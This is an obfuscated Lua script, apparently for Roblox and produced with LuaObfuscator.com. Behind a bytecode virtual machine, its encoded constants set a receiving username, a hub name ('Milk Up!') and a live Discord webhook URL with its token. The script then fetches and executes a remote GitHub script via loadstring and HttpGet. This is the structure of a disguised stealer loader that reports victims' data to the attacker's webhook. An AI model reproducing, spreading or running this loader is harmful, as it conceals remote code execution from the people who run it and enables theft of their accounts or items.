--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v89=v5(v83,v19);v19=nil;return v89;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-((1639 -(1523 + 114)) -(1 + 0)))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((1328 -396) -(857 + 74)))) ;return v84-(v84%1) ;else local v85=568 -(367 + 201) ;local v86;while true do if (v85==(1065 -(68 + 997))) then v86=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1270 -(226 + 1044) ;local v36;local v37;while true do if (v35==(4 -3)) then return (v37 * (373 -(32 + 85))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -((2127 -1235) + 65)) ;v35=1;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + ((16 -9) -3) ;return (v41 * (16777566 -(87 + 263))) + (v40 * (65716 -(67 + 113))) + (v39 * (139 + 49 + 68)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=3 -(6 -4) ;local v45=(v20(v43,953 -(802 + 150) ,53 -33 ) * ((3 -1)^(24 + 8))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,87 -(25 + 31) );local v47=((v20(v43,32)==(1 + (0 -0))) and  -(1 -0)) or (1188 -((1507 -(145 + 293)) + (548 -(44 + 386)))) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1 + 0 ;v44=0 -0 ;end elseif (v46==(2031 + 16)) then return ((v45==(791 -(368 + 423))) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/((7 -5)^(494 -(416 + (1512 -(998 + 488))))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=773 -(201 + 571) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==4) then while true do if (1~=v52) then else v55=nil;v56=nil;v52=2;end if (3==v52) then v59=nil;while true do if (v53==0) then local v97=1559 -(120 + 1439) ;local v98;while true do if (0~=v97) then else v98=1784 -(599 + 1185) ;while true do if (0~=v98) then else local v138=0 + 0 ;while true do if (v138~=(1 + 0)) then else v98=575 -(507 + 67) ;break;end if (v138~=(1749 -(1013 + 736))) then else v54={};v55={};v138=1;end end end if (v98==2) then v53=1;break;end if ((1 + 0)~=v98) then else local v139=0;while true do if (0~=v139) then else v56={};v57={v54,v55,nil,v56};v139=1;end if (1==v139) then v98=869 -(550 + 317) ;break;end end end end break;end end end if (v53~=2) then else for v100=1 -0 ,v23() do local v101=0;local v102;local v103;local v104;while true do if (v101~=(0 -0)) then else v102=0 -0 ;v103=nil;v101=286 -(134 + 151) ;end if (v101==(1666 -(970 + 695))) then v104=nil;while true do if (v102~=1) then else while true do if (v103==(0 -0)) then v104=v21();if (v20(v104,1,1991 -(582 + 1408) )==0) then local v175=0;local v176;local v177;local v178;local v179;local v180;while true do if (v175~=(0 -0)) then else v176=0 -0 ;v177=nil;v175=3 -2 ;end if (2==v175) then v180=nil;while true do if (v176==(1826 -(1195 + 629))) then while true do if (v177==1) then v180={v22(),v22(),nil,nil};if (v178==0) then local v187=0;local v188;while true do if ((0 + 0)==v187) then v188=0 + 0 ;while true do if (v188==(0 -0)) then v180[4 -1 ]=v22();v180[4]=v22();break;end end break;end end elseif (v178==1) then v180[1 + 2 ]=v23();elseif (v178==(1638 -(1373 + 263))) then v180[3]=v23() -(2^16) ;elseif (v178~=(1003 -(451 + 549))) then else local v199=0 + 0 ;local v200;local v201;while true do if (v199~=1) then else while true do if (v200==(0 -0)) then v201=0;while true do if (v201==0) then v180[3]=v23() -((2 -0)^16) ;v180[4]=v22();break;end end break;end end break;end if (v199==0) then v200=1384 -(746 + 638) ;v201=nil;v199=1;end end end v177=1 + 1 ;end if (v177==2) then local v184=0 -0 ;while true do if (v184~=(342 -(218 + 123))) then else v177=1584 -(1535 + 46) ;break;end if (v184~=0) then else if (v20(v179,1 + 0 ,1 + 0 )~=(561 -(306 + 254))) then else v180[2]=v59[v180[2]];end if (v20(v179,1 + 1 ,3 -1 )~=1) then else v180[3]=v59[v180[3]];end v184=1;end end end if (v177==(1467 -(899 + 568))) then local v185=0;while true do if (v185==(0 + 0)) then v178=v20(v104,4 -2 ,3);v179=v20(v104,607 -(268 + 335) ,6);v185=291 -(60 + 230) ;end if (v185==(573 -(426 + 146))) then v177=1;break;end end end if (v177~=(1 + 2)) then else if (v20(v179,1459 -(282 + 1174) ,814 -(569 + 242) )~=(2 -1)) then else v180[1 + 3 ]=v59[v180[4]];end v54[v100]=v180;break;end end break;end if (v176==0) then local v182=0;while true do if (v182==(1024 -(706 + 318))) then v177=1251 -(721 + 530) ;v178=nil;v182=1;end if ((1272 -(945 + 326))==v182) then v176=1;break;end end end if (v176~=(2 -1)) then else local v183=0;while true do if (v183==0) then v179=nil;v180=nil;v183=1;end if (v183==(1 + 0)) then v176=702 -(271 + 429) ;break;end end end end break;end if (v175==(1 + 0)) then v178=nil;v179=nil;v175=1502 -(1408 + 92) ;end end end break;end end break;end if ((1086 -(461 + 625))~=v102) then else v103=1288 -(993 + 295) ;v104=nil;v102=1;end end break;end end end for v105=1,v23() do v55[v105-1 ]=v28();end return v57;end if (v53~=(1 + 0)) then else v58=v23();v59={};for v107=1172 -(418 + 753) ,v58 do local v108=0;local v109;local v110;local v111;local v112;while true do if (v108==(1 + 0)) then v111=nil;v112=nil;v108=1 + 1 ;end if (v108~=(0 + 0)) then else v109=0 + 0 ;v110=nil;v108=530 -(406 + 123) ;end if (v108==2) then while true do if (v109==(1769 -(1749 + 20))) then local v150=0;while true do if (v150==(1 + 0)) then v109=1;break;end if (v150==(1322 -(1249 + 73))) then v110=0;v111=nil;v150=1;end end end if (v109~=1) then else v112=nil;while true do if (v110~=(0 + 0)) then else local v168=0;local v169;while true do if (v168==(1145 -(466 + 679))) then v169=0 -0 ;while true do if (v169~=(0 -0)) then else local v181=1900 -(106 + 1794) ;while true do if (v181==(1 + 0)) then v169=1;break;end if (v181~=(0 + 0)) then else v111=v21();v112=nil;v181=1;end end end if ((2 -1)==v169) then v110=2 -1 ;break;end end break;end end end if (v110==(115 -(4 + 110))) then if (v111==1) then v112=v21()~=0 ;elseif (v111==(586 -(57 + 527))) then v112=v24();elseif (v111==3) then v112=v25();end v59[v107]=v112;break;end end break;end end break;end end end v57[1430 -(41 + 1386) ]=v21();v53=2;end end break;end if (v52~=0) then else local v96=103 -(17 + 86) ;while true do if (v96==1) then v52=1 + 0 ;break;end if (v96~=(0 -0)) then else v53=0;v54=nil;v96=1;end end end if (v52~=2) then else v57=nil;v58=nil;v52=8 -5 ;end end break;end if (v51==(166 -(122 + 44))) then v52=0 -0 ;v53=nil;v51=1;end if (v51==1) then v54=nil;v55=nil;v51=6 -4 ;end if (v51==(3 + 0)) then v58=nil;v59=nil;v51=4;end if (v51==(1 + 1)) then v56=nil;v57=nil;v51=3;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end if (v88==1) then if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81>0) then local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==2) then for v166=v114,v73 do local v167=0;while true do if (v167==0) then v117=v117 + 1 ;v78[v166]=v115[v117];break;end end end break;end if (v113==0) then v114=v80[2];v115,v116=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v113=1;end if (v113==1) then v73=(v116 + v114) -1 ;v117=0;v113=2;end end else local v118=0;local v119;while true do if (v118==0) then v119=v80[2];v78[v119](v78[v119 + 1 ]);break;end end end elseif (v81==2) then local v120=v80[2];v78[v120]=v78[v120](v13(v78,v120 + 1 ,v73));else local v122=0;local v123;while true do if (0==v122) then v123=v80[2];v78[v123](v78[v123 + 1 ]);break;end end end elseif (v81<=5) then if (v81>4) then local v124=v80[2];v78[v124]=v78[v124](v13(v78,v124 + 1 ,v73));else do return;end end elseif (v81<=6) then v78[v80[2]]=v80[3];elseif (v81==7) then v78[v80[2]]=v78[v80[3]][v80[4]];else v78[v80[2]]=v62[v80[3]];end elseif (v81<=12) then if (v81<=10) then if (v81==9) then v78[v80[2]]=v80[3];else local v130=0;local v131;local v132;while true do if (v130==0) then v131=v80[2];v132=v78[v80[3]];v130=1;end if (v130==1) then v78[v131 + 1 ]=v132;v78[v131]=v132[v80[4]];break;end end end elseif (v81==11) then v78[v80[2]]();else v78[v80[2]]();end elseif (v81<=14) then if (v81==13) then v78[v80[2]]=v78[v80[3]][v80[4]];else local v135=0;local v136;local v137;while true do if (v135==0) then v136=v80[2];v137=v78[v80[3]];v135=1;end if (v135==1) then v78[v136 + 1 ]=v137;v78[v136]=v137[v80[4]];break;end end end elseif (v81<=15) then do return;end elseif (v81==16) then v78[v80[2]]=v62[v80[3]];else local v146=v80[2];local v147,v148=v71(v78[v146](v13(v78,v146 + 1 ,v80[3])));v73=(v148 + v146) -1 ;local v149=0;for v164=v146,v73 do local v165=0;while true do if (v165==0) then v149=v149 + 1 ;v78[v164]=v147[v149];break;end end end end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D6503113O006C6567616D65725F66616E6469736E657903073O004875624E616D6503083O004D696C6B20557021030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313431383432303233393831323532372O302F43632D423774726748396D7636775F2O43424B6F6C652O787368414851714C77783444454E2O76646C6E39344F76535455394B557157654475306A594D77762D32766D6F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F6769746875622E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F626C6F622F6D61696E2F7065616B2E6C756100143O0012103O00013O0020075O0002001209000100034O00033O000200010012103O00013O0020075O0004001209000100054O00033O000200010012103O00013O0020075O0006001209000100074O00033O000200010012103O00083O001210000100093O00200A00010001000A0012090003000B4O0001000100034O00055O00022O000B3O000100012O00043O00017O00",v9(),...);
